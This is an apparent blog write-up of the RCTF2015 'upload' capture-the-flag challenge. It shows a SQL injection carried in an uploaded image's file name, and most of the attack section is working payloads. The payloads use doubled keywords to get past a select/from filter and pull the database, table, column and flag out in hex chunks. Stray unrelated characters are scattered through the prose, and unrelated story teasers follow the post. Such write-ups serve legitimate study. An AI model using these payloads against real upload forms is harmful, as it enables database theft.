RCTF2015+XCTF復(fù)現(xiàn)之一次上傳的圖片的文件名造成注入

upload

sql注入

【原理】

首先先了解幾個(gè)函數(shù)的意義:

mid(),hex(),conv()

mid():MID(str,pos,len)

從字符串str返回一個(gè)len個(gè)字符的子串港华,從位置pos開始悯仙。使用FROM的變種形式是ANSI SQL92語法骑科。

mysql> select SUBSTRING('Quadratically',5,6);

? ? -> 'ratica'

hex():返回十六進(jìn)制值N一個(gè)字符串的表示,在此N是一個(gè)長(zhǎng)整型(BIGINT)數(shù)字滑绒,這等價(jià)于CONV(N,10,16)。如果N是NULL,返回NULL晤揣。

mysql> select HEX(255);

? ? -> 'FF'

CONV(N,from_base,to_base)

  在不同的數(shù)字基數(shù)之間轉(zhuǎn)換數(shù)字。將數(shù)字 N 從from_base 轉(zhuǎn)換到 to_base朱灿,并以字符串形式返回昧识。如果任何一個(gè)參數(shù)為 NULL,那么返回值也為 NULL盗扒。參數(shù) N 被解釋為是一個(gè)整數(shù)跪楞,但是也可以被指定為一個(gè)整數(shù)或一個(gè)字符串。最小基為 2侣灶,最大基為 36甸祭。如果 to_base 是一個(gè)負(fù)值,N 將被看作為是一個(gè)有符號(hào)數(shù)字褥影。否則池户,N 被視為是無符號(hào)的。CONV 以 64 位精度工作凡怎。

mysql> select conv(100,10,2);

  +----------------+

  | conv(100,10,2) |

  +----------------+

  | 1100100 |

  +----------------+

---------------------

【步驟】

圖片的文件名可以造成注入

因?yàn)檫@個(gè)題目對(duì)select from 有過濾校焦,所以用 selselectect frfromom 代替

構(gòu)造payload

查詢數(shù)據(jù)庫:

sql '+(selselectect CONV(substr(hex(dAtaBase()),1,12),16,10))+'.jpg

返回:sql 131277325825392 => web_up

sql '+(selselectect CONV(substr(hex(dAtaBase()),13,12),16,10))+'.jpg

返回:sql 1819238756 => load

拼接起來得知數(shù)據(jù)庫名為:web_upload

然后查表:

sql '+(seleselectct+CONV(substr(hex((selselectect TABLE_NAME frfromom

information_schema.TABLES where TABLE_SCHEMA = 'web_upload' limit

1,1)),1,12),16,10))+'.jpg

返回:sql 114784820031327 => hello_

sql '+(seleselectct+CONV(substr(hex((selselectect TABLE_NAME frfromom

information_schema.TABLES where TABLE_SCHEMA = 'web_upload' limit

1,1)),13,12),16,10))+'.jpg

返回:sql 112615676665705 => flag_i

sql '+(seleselectct+CONV(substr(hex((selselectect TABLE_NAME frfromom

information_schema.TABLES where TABLE_SCHEMA = 'web_upload' limit

1,1)),25,12),16,10))+'.jpg

返回:sql 126853610566245 => s_here

拼接起來得知存放flag的表名為:hello_flag_is_here

然后查這個(gè)表里有什么字段:

sql '+(seleselectct+CONV(substr(hex((seselectlect COLUMN_NAME frfromom

information_schema.COLUMNS where TABLE_NAME = 'hello_flag_is_here' limit

0,1)),1,12),16,10))+'.jpg

返回:sql 115858377367398 => i_am_f

sql '+(seleselectct+CONV(substr(hex((seselectlect COLUMN_NAME frfromom

information_schema.COLUMNS where TABLE_NAME = 'hello_flag_is_here' limit

0,1)),13,12),16,10))+'.jpg

返回:sql 7102823=> lag

拼接起來得知存放flag的字段是:i_am_flag

然后查詢flag:

sql '+(seleselectct+CONV(substr(hex((selselectect i_am_flag frfromom hello_flag_is_here limit 0,1)),1,12),16,10))+'.jpg

返回: sql 36427215695199 => !!_@m_

sql '+(seleselectct+CONV(substr(hex((selselectect i_am_flag frfromom hello_flag_is_here limit 0,1)),13,12),16,10))+'.jpg

返回:sql 92806431727430=> Th.e_F

sql '+(seleselectct+CONV(substr(hex((selselectect i_am_flag frfromom hello_flag_is_here limit 0,1)),25,12),16,10))+'.jpg

返回: sql 560750951=> !lag

拼起來之后得到flag:!!_@m_Th.e_F!lag

參考https://blog.csdn.net/niexinming/article/details/49888893?utm_source=blogxgwz0

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市统倒,隨后出現(xiàn)的幾起案子斟湃,更是在濱河造成了極大的恐慌,老刑警劉巖檐薯,帶你破解...
    沈念sama閱讀 219,490評(píng)論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件凝赛,死亡現(xiàn)場(chǎng)離奇詭異注暗,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)墓猎,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,581評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門捆昏,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人毙沾,你說我怎么就攤上這事骗卜。” “怎么了左胞?”我有些...
    開封第一講書人閱讀 165,830評(píng)論 0 356
  • 文/不壞的土叔 我叫張陵寇仓,是天一觀的道長(zhǎng)。 經(jīng)常有香客問我烤宙,道長(zhǎng)遍烦,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,957評(píng)論 1 295
  • 正文 為了忘掉前任躺枕,我火速辦了婚禮服猪,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘拐云。我一直安慰自己罢猪,他們只是感情好罚拟,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,974評(píng)論 6 393
  • 文/花漫 我一把揭開白布茂翔。 她就那樣靜靜地躺著,像睡著了一般形纺。 火紅的嫁衣襯著肌膚如雪薇缅。 梳的紋絲不亂的頭發(fā)上备闲,一...
    開封第一講書人閱讀 51,754評(píng)論 1 307
  • 那天,我揣著相機(jī)與錄音捅暴,去河邊找鬼。 笑死咧纠,一個(gè)胖子當(dāng)著我的面吹牛蓬痒,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播漆羔,決...
    沈念sama閱讀 40,464評(píng)論 3 420
  • 文/蒼蘭香墨 我猛地睜開眼梧奢,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來了演痒?” 一聲冷哼從身側(cè)響起亲轨,我...
    開封第一講書人閱讀 39,357評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎鸟顺,沒想到半個(gè)月后惦蚊,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體器虾,經(jīng)...
    沈念sama閱讀 45,847評(píng)論 1 317
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,995評(píng)論 3 338
  • 正文 我和宋清朗相戀三年蹦锋,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了兆沙。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 40,137評(píng)論 1 351
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡莉掂,死狀恐怖葛圃,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情憎妙,我是刑警寧澤库正,帶...
    沈念sama閱讀 35,819評(píng)論 5 346
  • 正文 年R本政府宣布,位于F島的核電站厘唾,受9級(jí)特大地震影響褥符,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜阅嘶,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,482評(píng)論 3 331
  • 文/蒙蒙 一属瓣、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧讯柔,春花似錦抡蛙、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,023評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至捣炬,卻和暖如春熊昌,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背湿酸。 一陣腳步聲響...
    開封第一講書人閱讀 33,149評(píng)論 1 272
  • 我被黑心中介騙來泰國(guó)打工婿屹, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人推溃。 一個(gè)月前我還...
    沈念sama閱讀 48,409評(píng)論 3 373
  • 正文 我出身青樓昂利,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親铁坎。 傳聞我的和親對(duì)象是個(gè)殘疾皇子蜂奸,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,086評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容